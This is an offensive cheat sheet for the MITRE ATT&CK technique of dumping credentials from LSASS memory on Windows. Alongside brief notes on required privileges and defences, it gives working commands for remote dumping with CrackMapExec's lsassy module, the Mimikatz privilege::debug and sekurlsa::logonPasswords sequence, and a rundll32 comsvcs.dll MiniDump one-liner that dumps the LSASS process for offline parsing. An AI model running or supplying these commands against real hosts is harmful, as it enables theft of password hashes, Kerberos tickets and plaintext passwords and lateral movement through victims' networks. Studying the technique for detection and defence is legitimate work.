LSASS Memory

MITRE ATT&CK, Credential Access, Sub-technique T1003.001

Adversaries abuse the Local Security Authority Subsystem Service (LSASS) to dump credentials for privilege escalation, data theft, and lateral movement. The process is a fruitful target because of the amount of sensitive material it holds in memory for every logged-on session: NT hashes, Kerberos tickets and keys, and, where WDigest caching is enabled, plaintext passwords. Reading that memory requires SeDebugPrivilege, i.e. an elevated local administrator, and it fails outright when LSASS runs as a protected process (RunAsPPL); with Credential Guard enabled the dump succeeds but contains no reusable secrets, because they live in the isolated LSA process instead. Opening a handle on lsass.exe is also one of the most reliably monitored events on an EDR-equipped host, so expect the commands below to be flagged.

Dumping LSASS

# Dumping LSASS remotely with CrackMapExec (needs local admin on the target; the lsassy module dumps LSASS over SMB and parses the dump with pypykatz, so no credentials-file is left behind). The maintained fork NetExec (nxc) takes the same options.
crackmapexec smb $ip -u $username -p $password -M lsassy

# Dumping LSASS with Mimikatz from an elevated prompt. privilege::debug acquires SeDebugPrivilege first; without it sekurlsa cannot open a handle on LSASS. To parse a saved dump instead of the live process, load it first with sekurlsa::minidump <file>.
privilege::debug
sekurlsa::logonPasswords

Dumping LSASS without Mimikatz

# Source: https://twitter.com/inversecos/status/1450331995112804358?s=20&t=rMzsQI6ENH2SYVVaTYTqAA
# PowerShell one-liner, run from an elevated session. The MiniDump export of comsvcs.dll writes a full-memory dump of the given PID (the "full" argument); Wait-Process blocks until rundll32 exits so the file is complete before it is copied off. The dump is a standard minidump and can be fed to sekurlsa::minidump or pypykatz offline.
rundll32.exe comsvcs.dll, MiniDump (Get-Process lsass).Id Temp\output.dmp full;Wait-Process -Id (Get-Process rundll32).id

References

MITRE ATT&CK T1003.001, OS Credential Dumping: LSASS Memory - https://attack.mitre.org/techniques/T1003/001/
inversecos on Twitter, comsvcs.dll MiniDump one-liner - https://twitter.com/inversecos/status/1450331995112804358?s=20&t=rMzsQI6ENH2SYVVaTYTqAA